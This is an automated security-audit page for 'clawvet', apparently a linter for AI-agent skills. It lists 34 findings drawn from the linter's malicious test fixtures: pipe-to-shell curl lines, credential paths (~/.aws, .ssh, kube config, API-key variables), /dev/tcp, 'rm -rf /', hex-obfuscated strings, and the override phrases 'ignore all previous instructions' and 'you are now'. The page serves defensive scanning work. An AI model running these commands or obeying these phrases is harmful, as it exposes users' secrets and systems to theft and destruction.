ClawAudit verdict

clawvet

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

The skill is a security linter for OpenClaw skills that runs static analysis, metadata validation, and typosquat detection; it has no capabilities listed and the executionSinkDetected flag reflects npx usage for the linter itself, which is appropriate.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives.

0 security · 100 transparency · 100 maintenance

Findings (34)

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

apps/api/test/fixtures/malicious-stealer/SKILL.md · code · curl -sL https://raw.githubusercontent.com/totally-legit/helper/main/setup.sh |

Pattern match critical

Pipe to bash — executes piped content as shell commands

apps/api/test/fixtures/malicious-stealer/SKILL.md · code · | bash

Pattern match critical

Accesses AWS credentials file

benchmarks/malicious/credential-theft/SKILL.md · code · ~/.aws/credentials

Pattern match high

Prompt injection — tries to override agent instructions

apps/api/test/api.test.ts · prose · downgraded · ignore all previous instructions

Pattern match high

References child_process — can spawn system processes

benchmarks/malicious/rce-base64/SKILL.md · code · child_process

Pattern match high

Pipe to sh — executes piped content as shell commands

apps/api/test/edge-cases.test.ts · prose · downgraded · |sh

Pattern match high

Uses eval() — can execute arbitrary code

apps/api/test/edge-cases.test.ts · prose · downgraded · eval(

Pattern match high

os.system/popen — direct OS command execution

apps/api/test/fixtures/obfuscated-payload/SKILL.md · code · os.system(

Pattern match high

Recursive delete from root or home — destructive command

apps/api/test/edge-cases.test.ts · prose · downgraded · rm -rf /

Pattern match high

Accesses .ssh directory

benchmarks/malicious/credential-theft/SKILL.md · code · .ssh/

Pattern match high

Accesses cloud provider credentials

benchmarks/malicious/credential-theft/SKILL.md · code · ~/.aws

Pattern match high

Instructs agent to read sensitive file paths

apps/api/test/fixtures/sneaky-injection/SKILL.md · prose · downgraded · Read all files in ~/

Pattern match high

Bash /dev/tcp — raw TCP connection via shell

apps/api/test/regex-safety.test.ts · prose · downgraded · /dev/tcp/

Pattern match high

Accesses sensitive system files

apps/api/test/regex-safety.test.ts · prose · downgraded · /etc/passwd

Pattern match high

Uses exec() — may execute shell commands

benchmarks/malicious/obfuscated-shell/SKILL.md · code · exec(

Pattern match high

Hex-encoded string — possible obfuscated payload

benchmarks/malicious/obfuscated-shell/SKILL.md · code · \x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73

Pattern match medium

Accesses sensitive environment variables

benchmarks/malicious/credential-theft/SKILL.md · code · process.env.ANTHROPIC_API_KEY

Pattern match medium

Dynamic import() — loads module at runtime

apps/api/src/routes/auth.ts · prose · downgraded · import("

Pattern match medium

Accesses system credential store

apps/api/test/edge-cases.test.ts · prose · downgraded · keychain

Pattern match medium

Possible prompt injection — attempts to redefine agent identity

apps/api/test/edge-cases.test.ts · prose · downgraded · you are now

Pattern match medium

Instructs covert action — may act without user awareness

apps/api/test/fixtures/sneaky-injection/SKILL.md · prose · downgraded · silently

Pattern match medium

Uses spawn() — can execute external programs

apps/api/test/regex-safety.test.ts · prose · downgraded · spawn(

Pattern match medium

References sudo — requests elevated privileges

apps/api/test/regex-safety.test.ts · prose · downgraded · sudo

Pattern match medium

String.fromCharCode — can build strings to evade detection

benchmarks/malicious/obfuscated-shell/SKILL.md · code · String.fromCharCode

Pattern match medium

References SSH/GPG private keys

apps/api/test/regex-safety.test.ts · prose · downgraded · SSH_KEY

Pattern match medium

Accesses Kubernetes config (may contain cluster credentials)

apps/api/test/regex-safety.test.ts · prose · downgraded · ~/.kube/config

Pattern match medium

Base64 decode (atob) — may hide malicious payloads

packages/shared/src/patterns.ts · prose · downgraded · atob(

Pattern match medium

setuid — privilege escalation mechanism

packages/shared/src/patterns.ts · prose · downgraded · setuid

Pattern match low

Makes HTTP request to external URL

benchmarks/malicious/credential-theft/SKILL.md · code · fetch('https://

Pattern match low

References agent memory files

apps/api/src/services/semantic-analysis.ts · prose · downgraded · MEMORY.md

Pattern match low

References tunneling service

apps/api/test/edge-cases.test.ts · prose · downgraded · ngrok

Pattern match low

Sets world-executable permissions

apps/api/test/regex-safety.test.ts · prose · downgraded · chmod 777

Pattern match low

Base64 encoding/decoding

apps/api/test/regex-safety.test.ts · prose · downgraded · BASE64_DECODE

Pattern match low

Popular HTTP library — network access

packages/cli/src/commands/scan.ts · prose · downgraded · Got

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/C/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

Requires 2 system binaries (1 elevated: npm).
